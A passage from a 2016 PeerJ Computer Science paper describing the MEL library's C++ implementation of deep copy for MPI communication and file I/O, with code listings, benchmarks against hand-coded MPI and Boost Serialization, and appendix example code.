15 static const bool value = sizeof(Test<T>(0)) == sizeof(char); 16 }; 17 18 // Shorthands for when implementing functions 19 template<typename T, typename R = void> 20 using enable_if_deep = typename std::enable_if< HasDeepCopyMethod<T>::value, R>::type; 21 template<typename T, typename R = void> 22 using enable_if_not_deep = typename std::enable_if <!(HasDeepCopyMethod<T>::value), R>::type; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 25/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 23 24 // Example usage in function definitions 25 template<typename T> enable_if_deep<T> someFunc(T &obj) { 26 std::cout << "Called with deep type!" << std::endl; 27 } 28 29 template<typename T> enable_if_not_deep<T> someFunc(T &obj) { 30 std::cout << "Called with non-deep type!" << std::endl; 31 } 32 33 // A deep type 34 struct StructA { 35 template<typename MSG> void DeepCopy(MSG &msg) {} 36 }; 37 38 StructA sA; 39 someFunc(sA); // Called with deep type! 40 41 int i; 42 someFunc(i); // Called with non-deep type! Transport-API implementation Next we describe the implementation of the transport API which specifies the traversal order our algorithm uses when performing deep copy. Message::packVar The Message::packVar function will call the deep copy function of the given variable to resolve its dependencies. This function works on the assumption that local member variables of the object have already been transported when the parent object was traversed. It is for this reason that Message::packVar is only defined for deep types, as a non-deep type will have been transported automatically with the parent. In all of the following listings for the implementations of the transport API the overloads for non-deep types have been omitted for space. Listing 13 MEL implementation–Message::packVar. 1 // Transport a deep object 2 template<typename D> 3 inline enable_if_deep<D> Message::packVar(D &obj) { 4 // Assumes that the footprint of obj has already been transported 5 obj.DeepCopy(*this); // *this == the Message object 6 } Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 26/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Message::packPtr When transporting dynamically allocated memory special care must be taken to correctly allocate memory on the receiving processes. Listing 14 shows the implementation of Message::packPtr for deep types. This function offloads its work to the transportAlloc helper function of the Message object. On receiving process, transportAlloc will make an allocation of len elements of the given type before receiving the data. On the sending process, transportAlloc is identical to transport and simply moves the requested data. For a deep type, Message::packPtr will then loop over all the received elements and call their deep copy functions to resolve any dependencies. Listing 14 MEL implementation–Message::packPtr. 1 // Transport a deep pointer to len objects 2 template<typename D> 3 inline enable_if_deep<D> Message::packPtr(D *&ptr, int len = 1) { 4 // On sender - If (len > 0) and (ptr != nullptr) send the memory 5 // 6 // On receiver - If (len > 0) and (ptr != nullptr) then overwrite 7 // the dangling ptr with a new allocation of len elements and 8 // receive the memory 9 transportAlloc(ptr, len); 10 11 // Followed by the recursion for deep types 12 if (ptr != nullptr) { 13 for (int i = 0; i < len; ++i) ptr[i].DeepCopy(*this); 14 } 15 } Message::packSharedPtr In complex structured data there is often a requirement for data to be self referencing. That is, one part of the deep structure may be pointed to from multiple other points within the structure. In these situations, a naı̈ve deep copy algorithm would traverse the shared object within the structure multiple times allocating a unique copy of it with each visit. If the shared object is deep itself and points to one of its ancestors within the structure, then the deep copy algorithm will become stuck in an infinite cycle within the data, allocating new memory with each loop. To avoid this and to allow complex self-referential data to be transported, we provide the Message::packSharedPtr function shown in Listing 15. This method checks the given pointer against a hash-map of type (pointer / pointer) to determine if the pointed to memory has already been transported. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 27/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Listing 15 MEL implementation–Message::packSharedPtr. 1 // Transport a deep shared pointer to len objects 2 template<typename D> 3 inline enable_if_deep<D> Message::packSharedPtr(D *&ptr, int len = 1) { 4 // Save the original pointer in case we modify it 5 D *oldPtr = ptr; 6 7 // Is the given pointer already in the hash-map? 8 // If so, set ptr equal to the pointer stored in the hash-map and 9 // return 10 if (pointerMap.find(oldPtr, ptr)) return; 11 12 // Same as for packPtr 13 transportAlloc(ptr, len); 14 15 // Insert the (newly allocated, on receiver) ptr into the hashmap 16 // with the original dangling pointer (from the sender) as the key 17 pointerMap.insert(oldPtr, ptr); 18 19 // Followed by the recursion for deep types 20 if (ptr != nullptr) { 21 for (int i = 0; i < len; ++i) ptr[i].DeepCopy(*this); 22 } 23 } During deep copy, the first time a shared pointer is passed to Message:: packSharedPtr on both the sending and receiving processes, it is transported in the same manner as in Message::packPtr by calling transportAlloc. On the sending process, the pointer is then inserted into the hash-map so it can be ignored if it is visited again. On the receiving processes, the call to transportAlloc will have caused the dangling pointer from the sender to have been overwritten with the newly allocated pointer. This new pointer is inserted into the hash-map with the original (dangling) pointer as the key, so that next time the receiver is asked to transport the same dangling pointer it can simply lookup and return the existing allocation. When a shared pointer that has already been visited is passed to Message:: packSharedPtr and it is found within the hash-map then sending process can simply return as no memory needs to be transported; the receiving process uses the dangling pointer passed to it to retrieve the valid pointer that was previously allocated and transported the last time the shared pointer was visited. All interaction with the hash-map is performed through the pointerMap.find and pointerMap.insert functions of the Message object. These functions are further discussed in Section Hash-map implementation. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 28/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ A nice property of this scheme is that the hash-map is never communicated and is constructed independently on both the sending and receiving processes. This means that for non-buffered communications the sender and receiver can traverse the structure in parallel (lock-step), and for buffered communications or buffered/non-buffered file- access the processes can traverse the structure independently. Message::packSTL As part of the transport API, we provide helper functions for moving common C++ STL containers. Listing 16 shows the implementation of Message::packSTL for C++ std:: vector’s of both deep and non-deep types. This is very similar to the implementation of Message::packPtr discussed previously with the slight difference that instead of making a new allocation on the receiving processes via transportAlloc we instead repair the internal pointer of the given std::vector by calling the placement-new operator to recreate the vector in place (as discussed in Listing 3). The implementations of Message:: packSTL for other STL containers is conducted in the same way and is omitted here. Listing 16 MEL implementation–Message::packSTL for std::vector. 1 // Transport a std::vector of deep types 2 template<typename D> 3 inline enable_if_deep<D> packSTL(std::vector<D> &obj) { 4 // std::vector::size() is safe to access even if the internal 5 // pointer is invalid 6 int len = obj.size(); 7 // If this is a recieving process then we need to repair the 8 // dangling internal pointer 9 if (!TRANSPORT_METHOD::SOURCE) { 10 // std::vector forces construction of elements 11 new (&obj) std::vector<D>(len, D()); 12 // we need to call the destructor explicitly in case any 13 //resources were acquired upon default construction of each 14 // element. 15 for (int i = 0; i < len; ++i) (&obj[i])->~D(); 16 } 17 18 D *p = &obj[0]; 19 if (len > 0) transport(p, len); 20 21 // Followed by the recursion for deep types 22 for (int i = 0; i < len; ++i) { 23 obj[i].DeepCopy(*this); 24 } 25 } Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 29/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Message::packRootVar, Message::packRootPtr, & Message::packRootSTL Finally, we provide a set of functions to simplify the implementation of the top- level interface. Recall that Message::packVar is only defined for deep types and assumes that the object’s footprint is always transported with the parent object. This is not the case for the top-level functions as no parent has been transported; in this case we must explicitly transport the object footprint regardless of whether it is deep or not. A similar scenario occurs for pointers passed to the top-level interface. In order to avoid duplicating all of the top-level functions to account for whether the root pointer is shared we always insert it into the hash-map as this is a small constant overhead that does not affect performance. Recall from the implementation of Message::packSharedPtr that on the receiving processes the dangling pointer from the sender is used as the key into the hash-map. Because of this, for the root pointer we must explicitly transport the address-value of the pointer from the sender to the receiving processes so they can insert it into their hash-maps. Finally, when considering STL containers passed to the top-level interface, receiving processes cannot query .size() of the container as its footprint was not previously transported. Instead, we explicitly transport the size of the container and call .resize() on the receiving processes. Listing 17 MEL implementation–Message::packRootVar, Message::packRootPtr, & Message:: packRootSTL. 1 // Transport the footprint of a non-deep object 2 template<typename T> 3 inline enable_if_not_deep<T> Message::packRootVar(T &obj) { 4 transport(obj); // Transport the footprint 5 } 6 7 // Transport the footprint of a deep object and call its 8 // DeepCopy function 9 template<typename D> 10 inline enable_if_deep<D> Message::packRootVar(D &obj) { 11 transport(obj); // Transport the footprint 12 obj.DeepCopy(*this); // Recurse on the deep structure 13 } 14 15 // Transport a root pointer to len deep objects 16 template<typename D> 17 inline enable_if_deep<D> Message::packRootPtr(D *&ptr, int len = 1) { 18 // Explicitly transport the pointer value for the root node 19 // so the it can be hashed correctly on recieving processes Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 30/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 20 size_t addr = (size_t) ptr; 21 transport(addr); 22 ptr = (D*) addr; 23 24 // Same as packSharedPtr, except we don't need to check the pointer 25 D *oldPtr = ptr; 26 transportAlloc(ptr, len); 27 pointerMap.insert(oldPtr, ptr); 28 29 // Followed by the recursion for deep types 30 if (ptr != nullptr) { 31 for (int i = 0; i < len; ++i) ptr[i].DeepCopy(*this); 32 } 33 } 34 35 // Transport a root stl container to len deep objects 36 template<typename D> 37 inline enable_if_deep<D> packRootSTL(std::vector<D> &obj) { 38 // Explicitly transport the length of the container 39 int len; 40 if (TRANSPORT_METHOD::SOURCE) { 41 len = obj.size(); transport(len); 42 } 43 else { 44 transport(len); obj.resize(len, D()); 45 for (int i = 0; i < len; ++i) (&obj[i])->~D(); 46 } 47 48 D *p = &obj[0]; 49 if (len > 0) transport(p, len); 50 51 // Followed by the recursion for deep types 52 for (int i = 0; i < len; ++i) { 53 obj[i].DeepCopy(*this); 54 } 55 } Transport method implementation & usage A transport method is a class which provides a single public-member function of the form template<typename T> inline void transport(T *&ptr, const int len) which defines how to move len objects of type T from a given pointer ptr. Listing 18 shows the implementation of the TransportSend transport method, which defines Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 31/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ how to move data using a discrete MPI_Send for each transport. An instance of a transport method carries any state needed to represent the data movement over the duration of the deep copy. In the case of TransportSend the state needed to represent the transfer are the MPI rank of the destination process, a tag to use for the communication, and the MPI communicator over which the data will be transferred. For other transport methods the state may be a file handle, or a pointer to an array used for buffering. Listing 18 MEL implementation–transport method for Message. 1 class TransportSend { 2 private: 3 // Members - Store any state or resources needed to maintain 4 // this transport method 5 const int pid, tag; 6 const MEL::Comm comm; 7 8 public: 9 // A transport method is either a source or a destination 10 // This is known at compile time 11 static constexpr bool SOURCE = true; 12 13 TransportSend(const int _pid, const int _tag, const MEL::Comm &_comm) 14 : pid(_pid), tag(_tag), comm(_comm) {} 15 16 // Transport function describes how to move data, in this case by 17 // performing an MPI_Send 18 template<typename T> 19 inline void transport(T *&ptr, const int len) { 20 MEL::Send(ptr, len, pid, tag, comm); 21 } 22 }; Listing 19 shows the implementation of one of the top-level interface functions for performing deep copy as an MPI_Send operation. A Message<TransportSend> object is instantiated, and the parameters from the function are transparently forwarded to the instance of the transport method within the Message object using std::forward<Args>(args). After creating the message object the pointer to the deep structure can be transported by calling Message::packRootPtr from the transport API. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 32/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Listing 19 MEL implementation–usage of a transport method in the top-level interface. 1 template<typename P, typename HASH_MAP = MEL::Deep::PointerHashMap> 2 inline enable_if_pointer<P> Send(P &ptr, const int dst, const int tag, const Comm &comm) { 3 // Arguments to the Message constructor are std::forward'd to the 4 // TransportSend constructor 5 Message<TransportSend, HASH_MAP> msg(dst, tag, comm); 6 7 // Transport the deep-structure 8 msg.packRootPtr(ptr); 9 } When performing a buffered deep copy the data is first packed into a contiguous buffer on the sending process before being transported as a single operation to the receiving processes where the data can then be expanded back into the deep structure. Listing 20 shows the implementation of BufferedSend and BufferedRecv which make use of the TransportBufferWrite and TransportBufferRead transport methods. Listing 20 MEL implementation–usage of a buffered transport method in the top-level interface. 1 template<typename P, typename HASH_MAP = MEL::Deep::PointerHashMap> 2 inline enable_if_pointer<P> BufferedSend(P &ptr, const int dst, 3 const int tag, 4 const Comm &comm) { 5 // Compute the buffer size for the deep structure and transport it 6 MEL::Deep::BufferedSend(ptr, dst, tag, comm, MEL::Deep:: BufferSize(ptr)); 7 } 8 9 template<typename P, typename HASH_MAP = MEL::Deep::PointerHashMap> 10 inline enable_if_pointer<P> BufferedSend(P &ptr, const int dst, 11 const int tag, 12 const Comm &comm, 13 const int bufferSize) { 14 // Allocate the buffer for packing 15 char *buffer = MEL::MemAlloc<char>(bufferSize); 16 17 // Deep-copy into the buffer 18 Message<TransportBufferWrite,HASH_MAP>msg(buffer,bufferSize); 19 msg.packRootPtr(ptr); 20 21 // Send the buffer in one message. Uses Message<TransportSend> Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 33/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 22 // bufferSize represents an upperbound on how much data there 23 // is to transport, 24 // msg.getOffset() gives us how much data was actually packed into 25 // the buffer 26 MEL::Deep::Send(buffer, msg.getOffset(), dst, tag, comm); 27 28 // Clean up the buffer 29 MEL::MemFree(buffer); 30 } 31 32 template<typename P, typename HASH_MAP = MEL::Deep::PointerHashMap> 33 inline enable_if_pointer<P> BufferedRecv(P &ptr, const int src, 34 const int tag, 35 const Comm &comm) { 36 // Recieve the packed buffer in one message. Uses 37 // Message<TransportRecv> 38 int bufferSize; 39 char *buffer = nullptr; 40 MEL::Deep::Recv(buffer, bufferSize, src, tag, comm); 41 // bufferSize onthereceivingprocessesisequaltomsg.getOffset() 42 // on the sending process 43 44 // Deep-copy out of the buffer 45 Message<TransportBufferRead, HASH_MAP> msg(buffer, bufferSize); 46 msg.packRootPtr(ptr); 47 48 // Clean up the buffer 49 MEL::MemFree(buffer); 50 } The last parameter to buffered transport methods on sending processes is an integer value representing the byte size of the contiguous buffer to use for packing the deep structure. If this value is omitted an overloaded version of the function computes the upper-bound of the buffer size needed by calling MEL::Deep::BufferSize before forwarding its parameters to the main function overload. Note that on the sending process for a buffered transport that msg.getOffset() is used as the length parameter when transporting the buffer (Listing 20, line 19) and not the bufferSize parameter. This means that if the sender blindly requests a large buffer because it does not know the size of the deep structure exactly, but only a part of the buffer is filled, only the used part of the buffer will be transported to the receiving processes. In the scenario where the buffer size given was not large enough to complete the deep copy, a run-time assertion occurs. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 34/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Hash-Map implementation The Message object is templated on a hash-map type that exposes public-member functions of the form: template<typename T> inline bool find(T* oldPtr, T* &ptr) template<typename T> inline void insert(T* oldPtr, T* ptr) This allows the user to provide an implementation of a hashing scheme optimized for pointers or to provide an adapter to a third-party hash-map implementation. One of the goals of MEL is to be portable and to not introduce external dependencies on the users code; because of this, our default hash-map implementation (Listing 21) is simply a wrapper around a std::unordered_map container between two void pointers. Listing 21 MEL implementation–default hash-map interface for MEL::Deep::Message. 1 class PointerHashMap { 2 private: 3 // Hashmaps for storing pointers to types of any size 4 std::unordered_map<void*, void*> pointerMap; 5 6 public: 7 // Pointer hashmap public interface 8 9 // Returns true if oldPtr is found in the hash-map and sets ptr 10 // equal to the stored value 11 // Otherwise returns false and ptr is unaltered 12 template<typename T> 13 inline bool find(T* oldPtr, T* &ptr) { 14 // Is oldPtr already in the hashmap? 15 const auto it = pointerMap.find((void*) oldPtr); 16 17 if (it != pointerMap.end()) { 18 // If so set ptr equal to the value stored in the hashmap 19 ptr = (T*) it->second; 20 return true; 21 } 22 return false; 23 } 24 25 // Insert ptr into the hashmap using oldptr as the key 26 template<typename T> 27 inline void insert(T* oldPtr, T* ptr) { 28 pointerMap.insert(std::make_pair((void*)oldPtr,(void*)ptr)); 29 } 30 }; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 35/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ BENCHMARKS For benchmarking we used the Swansea branch of the HPC Wales compute cluster. Nodes contain two Intel Xeon E5-2670 processors for a total of 16 physical cores with 64GB’s of RAM per-node, connected with Infiniband 40 Gbps networking. Benchmarks were run using Intel MPI 4.1 and compiling under Intel ICPC 13.0.1. Case study: ray-tracing scene structure To evaluate the performance of our algorithms relative to the equivalent hand coded MPI implementations and to other libraries that offer deep copy semantics such as Boost Serialization Library (Cogswell, 2005), we used the example of deep copying a large binary-tree structure between processes in the context of a distributed ray-tracer. A 3D scene (Fig. 3) is loaded on one process, consisting of triangular meshes, cameras, materials, and a bounding volume hierarchy to help accelerate ray-triangle intersection tests. For each experiment, a scene was loaded containing increasing numbers of the classic Utah Teapot mesh. The scene structure was then communicated using the various algorithms and the performance measured by comparing the times spent between MPI_Barrier’s before and after the communication. Broadcast–MPI vs. MEL For this example, just 4 lines of code calling the transport API were added to the BVH TreeNode and Scene structs (see appendix Scene Object containing MEL Deep Copy Methods) to enable both buffered and non-buffered deep copy using our algorithm. By comparison, the hand coded MPI non-buffered (see appendix Hand coded Non- Buffered Bcast of Scene Object) method took 34 lines of code, and 70 lines of code for the MPI buffered (see appendix Hand Coded Buffered Bcast of Scene Object) algorithm (not including comments, formatting, or trailing brackets), where pointers, allocations, and object construction had to be managed manually by the programmer. Also, these implementations only handled the case of Bcast operations, while the MEL version works transparently with all operations. Despite its generic interface and minimal syntax, our algorithm performs almost identically with hand coded MPI implementations in fewer lines of code and a fraction of the code complexity. Relevant code for this example is given in appendix Experiment 1: Broadcasting a Large Tree Structure. Figure 4A shows the resulting times from broadcasting increasingly larger scenes with each algorithm, between 256 nodes on HPC Wales. We can see that the buffered methods that only send a small constant number of messages between processes are faster than non-buffered methods despite the added overheads from packing and unpacking the data. The scalability of our algorithm with respect to the number of MPI processes involved in the communication is only bounded by the scalability of the transport method itself. In the case of a broadcast operation, Fig. 4B shows that varying the number Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 36/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ processes is of the same complexity as the underlying MPI_Bcast communication (logarithmic). File Write/Read–MEL vs. Boost When fault tolerance is a concern one method for recovering from a failed process is to periodically cache the current state of what is being worked on to disk so that in the event of a failure the data can be reloaded on a new process (potentially on a different node) and the work continued from the point at which it was last saved. When the data needed to store the state of a process is deep we incur the same problems that arise during deep copy. MEL implements file read and write operations for both buffered and non- buffered file access, utilizing the same user defined deep copy functions needed for the broadcast, send, and receive methods. For this experiment we also compared our performance to the Boost Serialization Library which is designed for saving and restoring structured data from file. Figure 5 shows the results of using MEL to write/read a large tree structure to or from file. Unlike with MPI communications where MEL’s buffered methods performed considerably faster than non-buffered variants due to the overheads from starting and ending network communications; with file access non-buffered reads perform almost identically to buffered methods. This is due to std::fstream’s use of an internal buffer to optimize file access, meaning that cost of starting and ending write/read operations is negligible compared to the cost of traversing the deep structure. While Boost Serialize also uses C++ streams their method of traversing the deep structure incurs significant overheads leading to poor and differing performance when reading and writing data. Finally, non-buffered writes perform slightly poorer then buffered writes due to file system having to allocate additional blocks as the file grows. Figure 3 Utah teapot mesh used for benchmarks. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 37/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Case study: graphs with cycles In the previous example the implementation of TreeNode was simplified by the observation that tree nodes were only pointed to from a single parent. However, in many applications multiple objects may share a common child. To show how MEL copes with structures containing pointers to shared dependents we used the example of communicating generic directed graph structures constructed in various connectivities (see Fig. 6A–6D). Relevant code for this example can be found in appendix Experiment 2: Communicating Generic Directed Graph structures. Fully connected graphs Figure 7 shows the results for communicating fully connected graph structures of increasing size in terms of broadcast (Fig. 7A) and writing a checkpoint to file (Fig. 7B). 0 500 1000 1500 2000 2500 3000 3500 4000 Number of Teapots (994 triangles each) 0 1 2 3 4 5 6 7 8 T im e ( S e co n d s) Ray Tracing Scene Object Single Node File-IO to Local SSD MEL Write MEL Buffered Write MEL Read MEL Buffered Read Boost Write Boost Read Figure 5 Time comparison of MEL to Boost Serialization Library for File Read/Write on a single node, to a within node Solid State Drive. A B Figure 4 Time comparison of algorithms broadcasting large tree structures between processes within node and on separate nodes. MEL requires the addition of four simple lines of code which greatly accelerate programming time and vastly reduces the chance of user induced bugs. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 38/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ In this example, n independent graph nodes will be traversed, each containing a list of pointers to all n nodes; during deep copy the hash-map will be queried n 2 times and will grow to contain n entries. Compared to the previous broadcast example for the ray tracing case study (Section Broadcast–MPI vs. MEL) where buffered communication showed better performance, with fully connected graphs we see the opposite effect. Non-buffered communication is consistently faster when the number of shared dependents is high. Internally, shared pointers are tracked using a hash table to ensure that only distinct pointers are transported and duplicates linked correctly. Because of the overheads attached to insert and find operations on the hash table, when the number of shared dependents is high the overhead from sending separate communications for each object in the structure is small compared to that of accessing the hash table. This has the effect of making the overhead from buffering the structure into a contiguous array for transport a bottleneck for deep copy. A similar trend is observed for file access, where non-buffered access is more efficient than buffered. In this example we also compare MEL to Boost Serialization library. Here shared pointer usage introduces significant overheads for Boost that our method avoids leading to significantly improved performance. Figure 6 Graph connectivities for {2 0 , 2 1 , 2 2 , 2 3 , 2 4 , : : : } nodes. A B Figure 7 Time comparison for broadcast and file-IO operations on fully connected graph structures. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 39/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Random graph Next we look at graphs with random connectivities. Figure 8 shows the results of communicating randomly generated graphs of different sizes for broadcasting (Fig. 8A) and writing a checkpoint to file (Fig. 8B). With this example, n independent graph nodes will be traversed, each containing a list of pointers to a random number of nodes (at least one); during deep copy the hash-map will be queried between n and n 2 times and will grow to contain n entries. Again, we see that when the number of shared dependents within the structure is large non-buffered communication performs consistently better than for buffered. We also see slightly better performance than with the fully connected graphs, showing that time complexity scales linearly with the number of graph edges. For file access the same trends emerge, where our method performs considerably faster than Boost Serialization. Ring graph A ring graph can be modeled a doubly-linked list where the last element is connected back to the first element in the structure. For this example, n independent graph nodes will be traversed, each containing a list of two pointers to previous and next nodes; during deep copy the hash-map will be queried 2n times and will grow to contain n entries. Figure 9 shows the results of communicating large ring structures for broadcasting (Fig. 9A) and writing a checkpoint to file (Fig. 9B). Because the number of shared edges is small we initially see that buffered communication is faster than non-buffered as with Section Broadcast–MPI vs. MEL. As the number of graph nodes in the structure passes 2,400, the amount of time needed to buffer the structure becomes larger than the overhead associated with starting and stopping separate MPI communications making non-buffered method more efficient for larger structures. For file access, we still see that our methods perform consistently faster than Boost’s even when the number of shared dependents is low. Binary tree Finally, we look at the example of constructing a binary tree shaped graph where there are no shared dependents. The generic container does not know this, and still must use A B Figure 8 Time comparison for broadcast and file-IO operations on randomly connected graph structures. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 40/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Message::packSharedPtr to transport child nodes, meaning it still incurs overheads of pointer lookup. In this example, n independent graph nodes will be traversed, each containing a list of one or two pointers to descending child nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. Figure 10 shows the results of communicating binary trees of different sizes in terms of broadcast (Fig. 10A) and writing a checkpoint to file (Fig. 10B). Similarly to communicating ring graphs, buffered network communication is significantly faster non-buffered methods until the structure becomes large enough that buffering becomes the main bottleneck. For file access the opposite is true, with non-buffered file access being slightly faster than buffered. We attribute this to std::fstream’s use of internal buffering, which renders the overheads from our fully buffered method unnecessary in this use case. CONCLUSIONS AND FUTURE WORK In this paper we have presented our implementation of deep copy semantics that encapsulates both buffered and non-buffered methods for dealing with complex structured data in the context of MPI inter-process communication and file access. Users may choose shared versions for when data structures contain cycles or faster non-shared variants for when they do not. We have shown that a generic implementation of such semantics can achieve like for like performance with hand crafted implementations while A B Figure 9 Time comparison for broadcast and file-IO operations on ring graph structures. A B Figure 10 Time comparison for broadcast and file-IO operations on binary tree graph structures. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 41/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ dramatically reducing code complexity and decreasing the chance for programmer error. We also demonstrate the method to be faster than utilizing Boost Serialization Library. MEL non-buffered methods provide a generic, low memory overhead, high performance (equal to hand crafted) solution to the deep copy problem. In the future we intend to include the implementation of a non-blocking top-level interface for asynchronous deep copy, additional transport methods for communicating deep structured data to CUDA and OpenCL based accelerators, and a hash-map implementation highly optimized for pointers. The algorithms discussed in this paper are implemented as part of the MEL, which is currently in development with the goal of creating a light weight, header only C++ wrapper around the C-style functions exposed by the MPI-3 standard, with backwards compatibility for systems where only MPI-2 is available. We plan to keep MEL in active development and hope that the research community will join us as we continue to grow the features and capabilities encompassed within the project. MEL is Open-Source and available on Github under the MIT license at: https://github. com/CS-Swansea/MEL. APPENDICES Experiment 1: broadcasting a large tree structure Full code for this example is available at https://github.com/CS-Swansea/MEL/ under example-code/RayTracingDeepCopy.cpp. Listing 22 Deep copy of ray tracing scene object. 1 //-----------------------------------------------------------// 2 // Example Usage: // 3 // mpirun -n [number of processes] ./RayTracingDeepCopy [mesh path] [method index] // 4 // mpirun -n 8 ./RayTracingDeepCopy "Teapot.obj" 0 // 5 //-----------------------------------------------------------// 6 int main(int argc, char *argv[]) { 7 MEL::Init(argc, argv); // Setup 8 9 // Who are we? 10 MEL::Comm comm = MEL::Comm::WORLD; 11 const int rank = MEL::CommRank(comm), 12 size = MEL::CommSize(comm); 13 14 // Check param count 15 if (argc != 3) { 16 if (rank == 0) std::cout << "Wrong number of parameters..."<< std::endl; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 42/59 https://github.com/CS-Swansea/MEL https://github.com/CS-Swansea/MEL https://github.com/CS-Swansea/MEL/ http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 17 MEL::Exit(-1); 18 // ^^ Equivalent of calling MPI_Finalize() followed by 19 // std::exit(-1) 20 } 21 22 // Which model should we load and which algorithm should we use? 23 const std::string meshPath = std::string(argv[1]); 24 const int method = std::stoi(argv[2]); 25 26 // Load the scene on the root process 27 Scene *scene = nullptr; 28 if (rank == 0) { 29 std::cout << "Loading scene..." << std::endl; 30 scene = loadScene(meshPath); 31 } 32 33 MEL::Barrier(comm); 34 auto startTime = MEL::Wtime();// Start the clock! 35 36 // Broadcast the Scene structure with the selected method 37 switch (method) { 38 case 0: 39 MEL::Deep::Bcast(scene, 0, comm); // Call MEL::Deep method. 40 break; 41 case 1: 42 MEL::Deep::BufferedBcast(scene, 0, comm); // Call MEL::Deep method. 43 break; 44 case 2: 45 MPI_NonBufferedBcast_Scene(scene, 0, (MPI_Comm) comm); // Hand written below 46 break; 47 case 3: 48 MPI_BufferedBcast_Scene(scene, 0, (MPI_Comm) comm); // Hand written below 49 break; 50 default: 51 if (rank == 0) std::cout << "Invalid method index..." << std:: endl; 52 MEL::Exit(-1); 53 } 54 55 MEL::Barrier(comm); Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 43/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 56 auto endTime = MEL::Wtime(); // Stop the clock! 57 58 if (rank == 0) { 59 std::cout << "Broadcast Scene in " << (endTime - startTime) 60 << " seconds..." << std::endl; 61 } 62 63 // All processes now have a Scene pointer that points to an 64 // equivalent data-structure 65 66 //-------------------------------------------------------// 67 // Now we can do some ray-tracing using the scene object! // 68 //-------------------------------------------------------// 69 70 // Clean up 71 MEL::MemDestruct(scene); 72 // ^^ Equivalent to explicitly calling the destructor followed by 73 // MPI_Free_mem. 74 // scene->~Scene(); 75 // MPI_Free_mem(scene); 76 77 MEL::Finalize(); // Tear down 78 return 0; 79 } Scene object containing MEL deep copy methods Listing 23 Ray tracing scene object. 1 //--------------------------------------------// 2 // Structure representing a node in the BVH Tree // 3 //-------------------------------------------// 4 struct TreeNode { 5 int startElem, endElem; // Start and End indices into vector of triangles 6 Vec v0, v1; // Vec is non-deep struct 7 TreeNode *leftChild, *rightChild; // TreeNode is deep struct 8 9 TreeNode() : TreeNode(0, 0) {} 10 TreeNode(const int _s, const int _e) : startElem(_s), endElem(_e), 11 leftChild(nullptr), 12 rightChild(nullptr), Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 44/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 13 v0{ INF, INF, INF }, 14 v1{ -INF, -INF, -INF } {} 15 16 // Ensure TreeNode can't be used incorrectly 17 TreeNode(const TreeNode &old) = delete; // Remove CopyConstructor 18 inline TreeNode& operator=(const TreeNode &old) = delete; // Remove CopyAssignment 19 TreeNode(TreeNode &&old) = delete; // Remove MoveConstructor 20 inline TreeNode& operator=(TreeNode &&old) = delete; // Remove MoveAssignment 21 22 ∼TreeNode() { 23 MEL::MemDestruct( leftChild); 24 MEL::MemDestruct(rightChild); 25 } 26 27 // Implementation of Ray-TreeNode (Ray-AABB) intersection 28 // omitted for this example 29 bool intersect(const Ray &rayInv, double &tmin, const double dist) const; 30 31 template<typename MSG> 32 inline void DeepCopy(MSG &msg) { 33 msg.packPtr( leftChild); 34 msg.packPtr(rightChild); 35 } 36 }; 37 38 //---------------------------------------------------// 39 // Structure representing a scene object to be rendered // 40 //---------------------------------------------------// 41 struct Scene { 42 Camera camera; // Camera is non-deep struct 43 std::vector<Material> materials; // Material is non-deep struct 44 std::vector<Triangle> mesh; // Triangle is non-deep struct 45 TreeNode *rootNode; // TreeNode is deep struct 46 47 Scene() : rootNode(nullptr) {} 48 Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 45/59 